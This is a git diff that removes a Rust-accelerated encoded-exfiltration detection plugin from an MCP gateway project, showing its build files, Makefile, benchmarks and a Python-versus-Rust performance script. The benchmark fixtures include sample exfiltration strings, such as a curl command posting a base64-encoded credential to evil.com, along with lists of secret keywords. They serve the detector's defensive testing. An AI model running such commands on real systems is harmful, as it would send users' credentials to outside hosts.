"registry+https://github.com/rust-lang/crates.io-index" -checksum = "29790946404f91d9c5d06f9874efddea1dc06c5efe94541a7d6863108e3a5e4b" -dependencies = [ - "same-file", - "winapi-util", -] - -[[package]] -name = "wasi" -version = "0.11.1+wasi-snapshot-preview1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ccf3ec651a847eb01de73ccad15eb7d99f80485de043efb2f370cd654f4ea44b" - -[[package]] -name = "wasm-bindgen" -version = "0.2.108" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "64024a30ec1e37399cf85a7ffefebdb72205ca1c972291c51512360d90bd8566" -dependencies = [ - "cfg-if", - "once_cell", - "rustversion", - "wasm-bindgen-macro", - "wasm-bindgen-shared", -] - -[[package]] -name = "wasm-bindgen-macro" -version = "0.2.108" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "008b239d9c740232e71bd39e8ef6429d27097518b6b30bdf9086833bd5b6d608" -dependencies = [ - "quote", - "wasm-bindgen-macro-support", -] - -[[package]] -name = "wasm-bindgen-macro-support" -version = "0.2.108" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5256bae2d58f54820e6490f9839c49780dff84c65aeab9e772f15d5f0e913a55" -dependencies = [ - "bumpalo", - "proc-macro2", - "quote", - "syn", - "wasm-bindgen-shared", -] - -[[package]] -name = "wasm-bindgen-shared" -version = "0.2.108" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1f01b580c9ac74c8d8f0c0e4afb04eeef2acf145458e52c03845ee9cd23e3d12" -dependencies = [ - "unicode-ident", -] - -[[package]] -name = "web-sys" -version = "0.3.85" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "312e32e551d92129218ea9a2452120f4aabc03529ef03e4d0d82fb2780608598" -dependencies = [ - "js-sys", - "wasm-bindgen", -] - -[[package]] -name = "winapi" -version = "0.3.9" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5c839a674fcd7a98952e593242ea400abe93992746761e38641405d28b00f419" -dependencies = [ - "winapi-i686-pc-windows-gnu", - "winapi-x86_64-pc-windows-gnu", -] - -[[package]] -name = "winapi-i686-pc-windows-gnu" -version = "0.4.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ac3b87c63620426dd9b991e5ce0329eff545bccbbb34f3be09ff6fb6ab51b7b6" - -[[package]] -name = "winapi-util" -version = "0.1.11" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c2a7b1c03c876122aa43f3020e6c3c3ee5c05081c9a00739faf7503aeba10d22" -dependencies = [ - "windows-sys", -] - -[[package]] -name = "winapi-x86_64-pc-windows-gnu" -version = "0.4.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f" - -[[package]] -name = "windows-core" -version = "0.62.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b8e83a14d34d0623b51dce9581199302a221863196a1dde71a7663a4c2be9deb" -dependencies = [ - "windows-implement", - "windows-interface", - "windows-link", - "windows-result", - "windows-strings", -] - -[[package]] -name = "windows-implement" -version = "0.60.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "053e2e040ab57b9dc951b72c264860db7eb3b0200ba345b4e4c3b14f67855ddf" -dependencies = [ - "proc-macro2", - "quote", - "syn", -] - -[[package]] -name = "windows-interface" -version = "0.59.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3f316c4a2570ba26bbec722032c4099d8c8bc095efccdc15688708623367e358" -dependencies = [ - "proc-macro2", - "quote", - "syn", -] - -[[package]] -name = "windows-link" -version = "0.2.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f0805222e57f7521d6a62e36fa9163bc891acd422f971defe97d64e70d0a4fe5" - -[[package]] -name = "windows-result" -version = "0.4.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7781fa89eaf60850ac3d2da7af8e5242a5ea78d1a11c49bf2910bb5a73853eb5" -dependencies = [ - "windows-link", -] - -[[package]] -name = "windows-strings" -version = "0.5.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7837d08f69c77cf6b07689544538e017c1bfcf57e34b4c0ff58e6c2cd3b37091" -dependencies = [ - "windows-link", -] - -[[package]] -name = "windows-sys" -version = "0.61.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ae137229bcbd6cdf0f7b80a31df61766145077ddf49416a728b02cb3921ff3fc" -dependencies = [ - "windows-link", -] - -[[package]] -name = "winnow" -version = "0.7.14" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5a5364e9d77fcdeeaa6062ced926ee3381faa2ee02d3eb83a5c27a8825540829" - -[[package]] -name = "zerocopy" -version = "0.8.39" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "db6d35d663eadb6c932438e763b262fe1a70987f9ae936e60158176d710cae4a" -dependencies = [ - "zerocopy-derive", -] - -[[package]] -name = "zerocopy-derive" -version = "0.8.39" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4122cd3169e94605190e77839c9a40d40ed048d305bfdc146e7df40ab0f3e517" -dependencies = [ - "proc-macro2", - "quote", - "syn", -] - -[[package]] -name = "zmij" -version = "1.0.21" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b8848ee67ecc8aedbaf3e4122217aff892639231befc6a1b58d29fff4c2cabaa" diff --git a/plugins_rust/encoded_exfil_detection/Cargo.toml b/plugins_rust/encoded_exfil_detection/Cargo.toml deleted file mode 100644 index 2208317f3a..0000000000 --- a/plugins_rust/encoded_exfil_detection/Cargo.toml +++ /dev/null @@ -1,40 +0,0 @@ -[package] -name = "encoded_exfil_detection" -version = "1.0.0-RC-1" -edition = "2024" -authors = ["ContextForge Contributors"] -license = "Apache-2.0" -repository = "https://github.com/IBM/mcp-context-forge" -description = "Rust acceleration for encoded exfiltration detection plugin" - -[lib] -name = "encoded_exfil_detection_rust" -crate-type = ["cdylib", "rlib"] - -[[bin]] -name = "stub_gen" -path = "src/bin/stub_gen.rs" - -[dependencies] -pyo3 = { version = "0.28.2", features = ["abi3-py311"] } -pyo3-stub-gen = "0.19" -regex = "1.12" -base64 = "0.22" -serde_json = "1" - -[dev-dependencies] -criterion = { version = "0.8", features = ["html_reports"] } - -[profile.release] -opt-level = 3 -lto = "fat" -codegen-units = 1 -strip = true - -[profile.bench] -inherits = "release" -debug = true - -[[bench]] -name = "encoded_exfil_detection" -harness = false diff --git a/plugins_rust/encoded_exfil_detection/Makefile b/plugins_rust/encoded_exfil_detection/Makefile deleted file mode 100644 index 6801c60329..0000000000 --- a/plugins_rust/encoded_exfil_detection/Makefile +++ /dev/null @@ -1,193 +0,0 @@ -# Makefile for Encoded Exfiltration Detection Plugin (Rust) -# Copyright 2025 -# SPDX-License-Identifier: Apache-2.0 -# -# Plugin-specific operations for encoded_exfil_detection -# -# Quick commands: -# make install - Build & install encoded_exfil_detection plugin -# make test - Test encoded_exfil_detection plugin -# make coverage - Generate code coverage report -# make compare - Run performance comparison (if available) - -.PHONY: help build dev test clean check lint fmt audit doc install coverage bench bench-compare compare verify test-integration test-all build-target - -# Default target -.DEFAULT_GOAL := help - -# Project metadata -DIST_DIR := target - -# Colors for output -BLUE := \033[0;34m -GREEN := \033[0;32m -YELLOW := \033[0;33m -RED := \033[0;31m -NC := \033[0m # No Color - -help: ## Show this help message - @echo "$(BLUE)Encoded Exfiltration Detection Plugin Makefile$(NC)" - @echo "" - @echo "$(GREEN)Available targets:$(NC)" - @grep -E '^[a-zA-Z_-]+:.*?## .*$$' $(MAKEFILE_LIST) | awk 'BEGIN {FS = ":.*?## "}; {printf " $(BLUE)%-20s$(NC) %s\n", $$1, $$2}' - @echo "" - @echo "$(YELLOW)Examples:$(NC)" - @echo " make install # Build and install plugin" - @echo " make test # Run tests" - @echo " make coverage # Generate coverage report" - -# Build targets -stub-gen: ## Generate Python type stubs (.pyi files) - @echo "$(GREEN)Generating Python type stubs...$(NC)" - @cargo run --bin stub_gen - @echo "$(GREEN)Type stubs generated $(NC)" - -build: stub-gen ## Build release extension (no install) - @echo "$(GREEN)Building...$(NC)" - @cd ../.. && uv run maturin build --release --manifest-path plugins_rust/encoded_exfil_detection/Cargo.toml - @echo "$(GREEN)Build complete$(NC)" - -build-target: stub-gen ## Build for specific target (use TARGET=...) - @echo "$(GREEN)Building for target: $(TARGET)...$(NC)" - @cd ../.. && uv run maturin build --release --manifest-path plugins_rust/encoded_exfil_detection/Cargo.toml --target $(TARGET) - @echo "$(GREEN)Build complete for $(TARGET)$(NC)" - -install: stub-gen - @echo "$(GREEN)Installing $(PACKAGE_NAME) plugin...$(NC)" - @cd ../.. && uv run maturin develop --release --manifest-path plugins_rust/encoded_exfil_detection/Cargo.toml - @echo "$(GREEN)Installation complete$(NC)" - -# Testing targets -test: ## Run Rust tests for plugin - @echo "$(GREEN)Running encoded_exfil_detection tests...$(NC)" - cargo test - -test-verbose: ## Run plugin tests (verbose) - @echo "$(GREEN)Running encoded_exfil_detection tests (verbose)...$(NC)" - cargo test --verbose - -test-python: ## Run Python unit tests for plugin (requires dev install) - @echo "$(GREEN)Running Python unit tests...$(NC)" - cd ../.. && uv run pytest tests -k encoded_exfil -v - -fmt: ## Format code with rustfmt - @echo "$(GREEN)Formatting code...$(NC)" - cargo fmt - -fmt-check: ## Check if code is formatted - @echo "$(GREEN)Checking code format...$(NC)" - cargo fmt -- --check - -clippy: ## Run clippy linter - @echo "$(GREEN)Running clippy...$(NC)" - cargo clippy --all-targets --all-features -- -D warnings - -check-all: ## Run all checks (format, lint, test) - @echo "$(GREEN)Running all checks...$(NC)" - @$(MAKE) --no-print-directory fmt-check - @$(MAKE) --no-print-directory clippy - @$(MAKE) --no-print-directory test - -verify: ## Verify plugin installation - @echo "$(GREEN)Verifying encoded_exfil_detection installation...$(NC)" - @uv run python -c "import encoded_exfil_detection; print('✅ encoded_exfil_detection available')" || echo "⚠️ encoded_exfil_detection not installed" - -test-integration: ## Run integration tests - @echo "$(GREEN)Running integration tests...$(NC)" - @cargo test --test '*' --release - -test-all: install test test-python ## Run all tests (Rust + Python) - @echo "$(GREEN)✓ All tests completed successfully$(NC)" - -# Benchmarking targets -bench: ## Run Rust benchmarks - @echo "$(GREEN)Running benchmarks...$(NC)" - @cargo bench - -bench-compare: ## Compare performance (alias for compare) - @$(MAKE) --no-print-directory compare - -compare: install ## Run performance comparison - @echo "$(GREEN)Running performance comparison...$(NC)" - @echo "$(YELLOW)Note: This plugin doesn't have a compare_performance.py script yet$(NC)" - -# Coverage targets -coverage: install ## Generate code coverage report - @echo "$(GREEN)Generating code coverage...$(NC)" - @command -v cargo-llvm-cov >/dev/null 2>&1 || { echo "$(YELLOW)Installing cargo-llvm-cov...$(NC)"; cargo install cargo-llvm-cov; } - @echo "$(YELLOW)Building extension with maturin first...$(NC)" - @$(MAKE) --no-print-directory install - @echo "$(YELLOW)Running cargo-llvm-cov...$(NC)" - @mkdir -p coverage - cargo llvm-cov --cobertura --output-path coverage/cobertura.xml - @echo "$(GREEN)Coverage report generated at coverage/cobertura.xml$(NC)" - -# Security and audit targets -audit: ## Run security audit with cargo-audit - @echo "$(GREEN)Running security audit...$(NC)" - @command -v cargo-audit >/dev/null 2>&1 || { echo "$(YELLOW)Installing cargo-audit...$(NC)"; cargo install cargo-audit; } - cargo audit - -audit-fix: ## Run security audit and apply fixes - @echo "$(GREEN)Running security audit with fixes...$(NC)" - cargo audit fix - -# Documentation targets -doc: ## Build Rust documentation - @echo "$(GREEN)Building documentation...$(NC)" - cargo doc --no-deps --document-private-items - -doc-open: doc ## Build and open documentation in browser - @echo "$(GREEN)Opening documentation...$(NC)" - cargo doc --no-deps --document-private-items --open - -# Cleaning targets -uninstall: ## Uninstall plugin from Python environment - @echo "$(YELLOW)Uninstalling encoded_exfil_detection...$(NC)" - @uv pip uninstall -y encoded_exfil_detection 2>/dev/null || pip uninstall -y encoded_exfil_detection 2>/dev/null || true - @echo "$(GREEN)encoded_exfil_detection uninstalled$(NC)" - -clean: ## Remove build artifacts - @echo "$(YELLOW)Cleaning build artifacts...$(NC)" - cargo clean - rm -rf target/ - rm -rf coverage/ - find . -type f -name "*.whl" -delete - find . -type f -name "*.pyc" -delete - find . -type d -name "__pycache__" -exec rm -rf {} + 2>/dev/null || true - -clean-all: clean ## Remove all generated files including caches - @echo "$(RED)Cleaning all generated files...$(NC)" - rm -rf ~/.cargo/registry/cache/ - rm -rf ~/.cargo/git/db/ - -info: ## Show build information - @echo "$(BLUE)Build Information:$(NC)" - @echo " Rust version: $$(rustc --version)" - @echo " Cargo version: $$(cargo --version)" - @echo " Maturin version: $$(uv run maturin --version 2>/dev/null || echo 'not installed')" - @echo " Python version: $$(uv run python --version)" - @echo "" - @echo "$(BLUE)Plugin Information:$(NC)" - @echo " Name: encoded_exfil_detection" - @echo " Version: $$(grep '^version' Cargo.toml | head -1 | cut -d'"' -f2)" - @echo " License: Apache-2.0" - -deps: ## Install/update dependencies - @echo "$(GREEN)Installing/updating dependencies...$(NC)" - @command -v uv >/dev/null 2>&1 && uv pip install maturin || { echo "$(YELLOW)Installing maturin...$(NC)"; uv pip install maturin; } - @command -v cargo-audit >/dev/null 2>&1 || { echo "$(YELLOW)Installing cargo-audit...$(NC)"; cargo install cargo-audit; } - @command -v cargo-tarpaulin >/dev/null 2>&1 || { echo "$(YELLOW)Installing cargo-tarpaulin...$(NC)"; cargo install cargo-tarpaulin; } - @echo "$(GREEN)Dependencies installed!$(NC)" - -# All PHONY targets -.PHONY: help install build-target \ - test test-verbose test-python test-integration test-all \ - fmt fmt-check clippy check-all \ - bench bench-compare compare \ - audit audit-fix \ - doc doc-open \ - coverage \ - clean clean-all \ - uninstall verify stub-gen \ - info deps diff --git a/plugins_rust/encoded_exfil_detection/benches/encoded_exfil_detection.rs b/plugins_rust/encoded_exfil_detection/benches/encoded_exfil_detection.rs deleted file mode 100644 index 1cecce8c4c..0000000000 --- a/plugins_rust/encoded_exfil_detection/benches/encoded_exfil_detection.rs +++ /dev/null @@ -1,186 +0,0 @@ -// Copyright 2026 -// SPDX-License-Identifier: Apache-2.0 -// -// Criterion benchmarks for encoded exfiltration detection performance - -use base64::Engine; -use base64::engine::general_purpose::STANDARD; -use criterion::{BenchmarkId, Criterion, Throughput, criterion_group, criterion_main}; -use std::hint::black_box; - -// Since the main functions are not public, we'll benchmark through a simple workload -// that exercises the regex patterns and detection logic indirectly - -fn bench_base64_pattern_matching(c: &mut Criterion) { - let encoded = STANDARD.encode(b"authorization: bearer secret-token-value-here"); - let text = format!("curl -d '{}' https://example.com/upload", encoded); - - c.bench_function("base64_pattern_match", |b| { - b.iter(|| { - // Simple pattern matching to simulate detection overhead - let _contains_base64 = black_box(&text).contains(&encoded); - }) - }); -} - -fn bench_hex_pattern_matching(c: &mut Criterion) { - let hex_data = "48656c6c6f20576f726c6421205365637265742044617461"; - let text = format!("data={}&action=upload", hex_data); - - c.bench_function("hex_pattern_match", |b| { - b.iter(|| { - let _contains_hex = black_box(&text).contains(hex_data); - }) - }); -} - -fn bench_percent_encoding_pattern(c: &mut Criterion) { - let percent_encoded = "%48%65%6c%6c%6f%20%57%6f%72%6c%64%21%20%53%65%63%72%65%74"; - let text = format!("url=https://example.com?data={}", percent_encoded); - - c.bench_function("percent_encoding_match", |b| { - b.iter(|| { - let _contains_percent = black_box(&text).contains(percent_encoded); - }) - }); -} - -fn bench_multiple_encodings(c: &mut Criterion) { - let base64_data = STANDARD.encode(b"password=secret123"); - let hex_data = "48656c6c6f"; - let percent_data = "%48%65%6c%6c%6f"; - - let text = format!( - "Request: base64={}, hex={}, percent={}, url=https://example.com", - base64_data, hex_data, percent_data - ); - - c.bench_function("multiple_encodings", |b| { - b.iter(|| { - let _b64 = black_box(&text).contains(&base64_data); - let _hex = black_box(&text).contains(hex_data); - let _pct = black_box(&text).contains(percent_data); - }) - }); -} - -fn bench_large_text_scanning(c: &mut Criterion) { - let mut group = c.benchmark_group("large_text_scan"); - - for size in [100, 500, 1000, 5000].iter() { - let mut text = String::new(); - for i in 0..*size { - let encoded = STANDARD.encode(format!("data-{}-secret-value", i)); - text.push_str(&format!("Entry {}: {}\n", i, encoded)); - } - - group.throughput(Throughput::Bytes(text.len() as u64)); - group.bench_with_input(BenchmarkId::from_parameter(size), &text, |b, text| { - b.iter(|| { - // Simulate scanning overhead - let _lines = black_box(text).lines().count(); - }) - }); - } - - group.finish(); -} - -fn bench_base64_decoding(c: &mut Criterion) { - let encoded = STANDARD.encode(b"This is a secret message that should be detected"); - - c.bench_function("base64_decode", |b| { - b.iter(|| { - let _decoded = STANDARD.decode(black_box(&encoded)).ok(); - }) - }); -} - -fn bench_entropy_calculation_simulation(c: &mut Criterion) { - let data = b"This is some random data with varying entropy levels!"; - - c.bench_function("entropy_calc_simulation", |b| { - b.iter(|| { - // Simulate entropy calculation overhead - let mut counts = [0usize; 256]; - for byte in black_box(data) { - counts[*byte as usize] += 1; - } - let _total = counts.iter().sum::(); - }) - }); -} - -fn bench_sensitive_keyword_search(c: &mut Criterion) { - let text = "This text contains password and authorization tokens with secret api_key values"; - let keywords = ["password", "secret", "token", "api_key", "authorization"]; - - c.bench_function("keyword_search", |b| { - b.iter(|| { - for keyword in &keywords { - let _found = black_box(text).contains(keyword); - } - }) - }); -} - -fn bench_realistic_payload(c: &mut Criterion) { - let sensitive_data = STANDARD.encode(b"password=admin123&token=secret-bearer-token"); - let realistic_text = format!( - r#"{{ - "action": "upload", - "data": "{}", - "url": "https://example.com/webhook", - "method": "POST" - }}"#, - sensitive_data - ); - - c.bench_function("realistic_payload_scan", |b| { - b.iter(|| { - let text = black_box(&realistic_text); - let _has_base64 = text.contains(&sensitive_data); - let _has_url = text.contains("https://"); - let _has_upload = text.contains("upload"); - }) - }); -} - -fn bench_escaped_hex_pattern(c: &mut Criterion) { - let escaped_hex = r"\x48\x65\x6c\x6c\x6f\x20\x57\x6f\x72\x6c\x64"; - let text = format!("payload={}&action=send", escaped_hex); - - c.bench_function("escaped_hex_match", |b| { - b.iter(|| { - let _contains = black_box(&text).contains(escaped_hex); - }) - }); -} - -fn bench_no_encoding_clean_text(c: &mut Criterion) { - let clean_text = "This is just normal text without any encoded data or suspicious patterns. \ - It should be fast to process since there's nothing to detect."; - - c.bench_function("clean_text_scan", |b| { - b.iter(|| { - let _len = black_box(clean_text).len(); - }) - }); -} - -criterion_group!( - benches, - bench_base64_pattern_matching, - bench_hex_pattern_matching, - bench_percent_encoding_pattern, - bench_multiple_encodings, - bench_large_text_scanning, - bench_base64_decoding, - bench_entropy_calculation_simulation, - bench_sensitive_keyword_search, - bench_realistic_payload, - bench_escaped_hex_pattern, - bench_no_encoding_clean_text, -); - -criterion_main!(benches); diff --git a/plugins_rust/encoded_exfil_detection/compare_performance.py b/plugins_rust/encoded_exfil_detection/compare_performance.py deleted file mode 100755 index cd517b937a..0000000000 --- a/plugins_rust/encoded_exfil_detection/compare_performance.py +++ /dev/null @@ -1,386 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding: utf-8 -*- -"""Compare Python and Rust encoded exfil detection hook performance. - -This benchmark measures the real plugin hook path (prompt_pre_fetch and -tool_post_invoke), not just the raw Rust scanner. It reports Python-vs-Rust -timings in ms/iteration for identical payloads. - -Modes: -- latency (default): per-call latency comparison, sequential -- throughput: max ops/sec at various concurrency levels using asyncio tasks - -Scenarios vary across: -- payload size: small (1 finding), medium (5 findings), large (20+ findings) -- payload type: base64, hex, percent-encoding, mixed, clean (no findings) -- hook: prompt_pre_fetch, tool_post_invoke - -A parity smoke test runs before each benchmark to verify that Python and Rust -produce identical finding counts for the same input. - -Usage: - uv run python plugins_rust/encoded_exfil_detection/compare_performance.py - uv run python plugins_rust/encoded_exfil_detection/compare_performance.py --mode throughput - uv run python plugins_rust/encoded_exfil_detection/compare_performance.py --iterations 500 -""" - -from __future__ import annotations - -# Standard -import argparse -import asyncio -import base64 -from dataclasses import dataclass -from pathlib import Path -import statistics -import sys -import time -from typing import Any, Sequence - -ROOT = Path(__file__).resolve().parents[2] -if str(ROOT) not in sys.path: - sys.path.insert(0, str(ROOT)) - -# First-Party -from mcpgateway.plugins.framework import GlobalContext, PluginConfig, PluginContext, PromptPrehookPayload, ToolPostInvokePayload -from plugins.encoded_exfil_detection.encoded_exfil_detector import EncodedExfilDetectorPlugin, _RUST_AVAILABLE - - -@dataclass(frozen=True) -class Scenario: - """A benchmark scenario.""" - - name: str - hook: str - payload_factory: str # key into PAYLOAD_FACTORIES - description: str - - -class BenchmarkResult: - """One measured implementation result.""" - - def __init__(self, implementation: str, timings_ms: list[float]) -> None: - """Initialize benchmark result from raw timings.""" - self.implementation = implementation - self.mean_ms = statistics.mean(timings_ms) if timings_ms else 0.0 - self.median_ms = statistics.median(timings_ms) if timings_ms else 0.0 - self.p95_ms = _percentile(timings_ms, 0.95) - self.stdev_ms = statistics.stdev(timings_ms) if len(timings_ms) > 1 else 0.0 - - -class ThroughputResult: - """Throughput benchmark result.""" - - def __init__(self, implementation: str, tasks: int, ops_per_sec: float, total_ops: int, duration_sec: float) -> None: - """Initialize throughput result.""" - self.implementation = implementation - self.tasks = tasks - self.ops_per_sec = ops_per_sec - self.total_ops = total_ops - self.duration_sec = duration_sec - - -def _percentile(values: Sequence[float], pct: float) -> float: - """Return a simple percentile from a float sequence.""" - if not values: - return 0.0 - ordered = sorted(values) - idx = min(len(ordered) - 1, max(0, int(round((len(ordered) - 1) * pct)))) - return ordered[idx] - - -# --------------------------------------------------------------------------- -# Payload factories -# --------------------------------------------------------------------------- - -def _make_small_base64() -> dict[str, Any]: - """Single base64-encoded credential with egress context.""" - encoded = base64.b64encode(b"authorization: bearer super-secret-token-value").decode() - return {"input": f"curl -d '{encoded}' https://example.com/hook"} - - -def _make_medium_mixed() -> dict[str, Any]: - """5 encoded segments across base64 and hex.""" - segments: dict[str, str] = {} - for i in range(3): - segments[f"b64_{i}"] = f"curl {base64.b64encode(f'password=secret-value-{i:03d}'.encode()).decode()} webhook" - for i in range(2): - segments[f"hex_{i}"] = f"upload {f'api_key=secret-credential-{i:03d}'.encode().hex()}" - return segments - - -def _make_large_mixed() -> dict[str, Any]: - """20+ encoded segments in a nested structure.""" - items: list[dict[str, str]] = [] - for i in range(10): - items.append({ - "b64": f"send {base64.b64encode(f'token=secret-value-{i:03d}-long-enough'.encode()).decode()} webhook", - "hex": f"upload {f'password=credential-{i:03d}-long-enough'.encode().hex()}", - }) - return {"content": items} - - -def _make_clean() -> dict[str, Any]: - """Clean payload with no encoded segments.""" - return { - "message": "The weather in San Francisco is 72F and sunny.", - "details": "Temperature 72 fahrenheit in San Francisco", - "context": "Normal conversational text without any encoded payloads or suspicious content whatsoever.", - } - - -def _make_large_text() -> dict[str, Any]: - """Large text payload (~50KB) with a few encoded segments buried in clean text.""" - clean_lines = ["This is a normal line of text with no suspicious content. " * 5] * 100 - encoded = base64.b64encode(b"password=super-secret-credential-value-hidden").decode() - clean_lines[25] = f"curl -d '{encoded}' https://evil.com/collect" - clean_lines[75] = f"upload {b'api_key=another-hidden-credential-value'.hex()}" - return {"body": "\n".join(clean_lines)} - - -PAYLOAD_FACTORIES: dict[str, Any] = { - "small_base64": _make_small_base64, - "medium_mixed": _make_medium_mixed, - "large_mixed": _make_large_mixed, - "clean": _make_clean, - "large_text": _make_large_text, -} - -SCENARIOS: list[Scenario] = [ - Scenario("small-b64-prompt", "prompt_pre_fetch", "small_base64", "1 base64 finding, prompt hook"), - Scenario("small-b64-tool", "tool_post_invoke", "small_base64", "1 base64 finding, tool hook"), - Scenario("medium-mixed-prompt", "prompt_pre_fetch", "medium_mixed", "5 mixed findings, prompt hook"), - Scenario("large-mixed-tool", "tool_post_invoke", "large_mixed", "20+ mixed findings, tool hook"), - Scenario("clean-prompt", "prompt_pre_fetch", "clean", "clean payload, prompt hook"), - Scenario("clean-tool", "tool_post_invoke", "clean", "clean payload, tool hook"), - Scenario("large-text-tool", "tool_post_invoke", "large_text", "~50KB text with 2 findings, tool hook"), -] - - -# --------------------------------------------------------------------------- -# Plugin construction -# --------------------------------------------------------------------------- - -def _make_plugin(use_rust: bool) -> EncodedExfilDetectorPlugin: - """Create plugin and force implementation path.""" - import plugins.encoded_exfil_detection.encoded_exfil_detector as mod - - if not use_rust: - # Disable Rust BEFORE creating plugin so engine is not initialized - original = mod._RUST_AVAILABLE - mod._RUST_AVAILABLE = False - plugin = EncodedExfilDetectorPlugin( - PluginConfig( - name="exfil-bench", - kind="plugins.encoded_exfil_detection.encoded_exfil_detector.EncodedExfilDetectorPlugin", - hooks=["prompt_pre_fetch", "tool_post_invoke"], - config={"block_on_detection": False, "log_detections": False}, - ) - ) - mod._RUST_AVAILABLE = original # restore immediately - plugin._original_rust_available = True # type: ignore[attr-defined] - assert plugin._rust_engine is None, "Python path should not have Rust engine" - return plugin - - if not _RUST_AVAILABLE: - raise RuntimeError("Rust encoded exfil module not available. Run: uv pip install -e plugins_rust/encoded_exfil_detection/") - plugin = EncodedExfilDetectorPlugin( - PluginConfig( - name="exfil-bench", - kind="plugins.encoded_exfil_detection.encoded_exfil_detector.EncodedExfilDetectorPlugin", - hooks=["prompt_pre_fetch", "tool_post_invoke"], - config={"block_on_detection": False, "log_detections": False}, - ) - ) - assert plugin._rust_engine is not None, "Rust path should have Rust engine" - return plugin - - -def _restore_rust(plugin: EncodedExfilDetectorPlugin) -> None: - """No-op — Rust availability is restored immediately in _make_plugin.""" - pass - - -def _context() -> PluginContext: - """Build a benchmark plugin context.""" - return PluginContext(global_context=GlobalContext(request_id="bench")) - - -async def _invoke(plugin: EncodedExfilDetectorPlugin, hook: str, payload_data: dict[str, Any]) -> Any: - """Invoke the selected plugin hook.""" - ctx = _context() - if hook == "prompt_pre_fetch": - return await plugin.prompt_pre_fetch(PromptPrehookPayload(prompt_id="bench", args=payload_data), ctx) - return await plugin.tool_post_invoke(ToolPostInvokePayload(name="bench_tool", result=payload_data), ctx) - - -# --------------------------------------------------------------------------- -# Parity check -# --------------------------------------------------------------------------- - -async def _parity_check(scenario: Scenario) -> None: - """Verify Python and Rust produce identical finding counts.""" - payload_data = PAYLOAD_FACTORIES[scenario.payload_factory]() - plugin_py = _make_plugin(use_rust=False) - plugin_rs = _make_plugin(use_rust=True) - - result_py = await _invoke(plugin_py, scenario.hook, payload_data) - _restore_rust(plugin_py) - result_rs = await _invoke(plugin_rs, scenario.hook, payload_data) - - count_py = (result_py.metadata or {}).get("encoded_exfil_count", 0) - count_rs = (result_rs.metadata or {}).get("encoded_exfil_count", 0) - - if count_py != count_rs: - print(f" PARITY FAIL [{scenario.name}]: Python={count_py}, Rust={count_rs}") - sys.exit(1) - print(f" parity OK [{scenario.name}]: {count_py} findings") - - -# --------------------------------------------------------------------------- -# Latency benchmark -# --------------------------------------------------------------------------- - -async def _bench_latency(scenario: Scenario, iterations: int, warmup: int) -> tuple[BenchmarkResult, BenchmarkResult]: - """Run latency benchmark for one scenario, return (python_result, rust_result).""" - payload_data = PAYLOAD_FACTORIES[scenario.payload_factory]() - results: dict[str, list[float]] = {"Python": [], "Rust": []} - - for impl_name, use_rust in [("Python", False), ("Rust", True)]: - plugin = _make_plugin(use_rust=use_rust) - - # Warmup - for _ in range(warmup): - await _invoke(plugin, scenario.hook, payload_data) - - # Measure - for _ in range(iterations): - start = time.perf_counter_ns() - await _invoke(plugin, scenario.hook, payload_data) - elapsed_ms = (time.perf_counter_ns() - start) / 1_000_000 - results[impl_name].append(elapsed_ms) - - _restore_rust(plugin) - - return BenchmarkResult("Python", results["Python"]), BenchmarkResult("Rust", results["Rust"]) - - -# --------------------------------------------------------------------------- -# Throughput benchmark -# --------------------------------------------------------------------------- - -async def _bench_throughput(scenario: Scenario, concurrency_levels: list[int], ops_per_task: int) -> list[ThroughputResult]: - """Run throughput benchmark at various concurrency levels.""" - payload_data = PAYLOAD_FACTORIES[scenario.payload_factory]() - all_results: list[ThroughputResult] = [] - - for impl_name, use_rust in [("Python", False), ("Rust", True)]: - for num_tasks in concurrency_levels: - plugin = _make_plugin(use_rust=use_rust) - - async def _worker() -> int: - for _ in range(ops_per_task): - await _invoke(plugin, scenario.hook, payload_data) - return ops_per_task - - start = time.perf_counter() - tasks = [asyncio.create_task(_worker()) for _ in range(num_tasks)] - counts = await asyncio.gather(*tasks) - elapsed = time.perf_counter() - start - total_ops = sum(counts) - - all_results.append(ThroughputResult( - implementation=impl_name, - tasks=num_tasks, - ops_per_sec=total_ops / elapsed if elapsed > 0 else 0, - total_ops=total_ops, - duration_sec=round(elapsed, 3), - )) - _restore_rust(plugin) - - return all_results - - -# --------------------------------------------------------------------------- -# Reporting -# --------------------------------------------------------------------------- - -def _print_latency_table(scenario: Scenario, py: BenchmarkResult, rs: BenchmarkResult) -> None: - """Print latency comparison table for one scenario.""" - speedup = py.mean_ms / rs.mean_ms if rs.mean_ms > 0 else float("inf") - print(f"\n{'=' * 72}") - print(f" {scenario.name}: {scenario.description}") - print(f"{'=' * 72}") - print(f" {'Impl':<10} {'Mean':>10} {'Median':>10} {'P95':>10} {'StdDev':>10}") - print(f" {'─' * 50}") - for r in [py, rs]: - print(f" {r.implementation:<10} {r.mean_ms:>9.3f}ms {r.median_ms:>9.3f}ms {r.p95_ms:>9.3f}ms {r.stdev_ms:>9.3f}ms") - print(f" {'─' * 50}") - print(f" Speedup: {speedup:.2f}x") - - -def _print_throughput_table(scenario: Scenario, results: list[ThroughputResult]) -> None: - """Print throughput comparison table for one scenario.""" - print(f"\n{'=' * 72}") - print(f" {scenario.name}: {scenario.description}") - print(f"{'=' * 72}") - print(f" 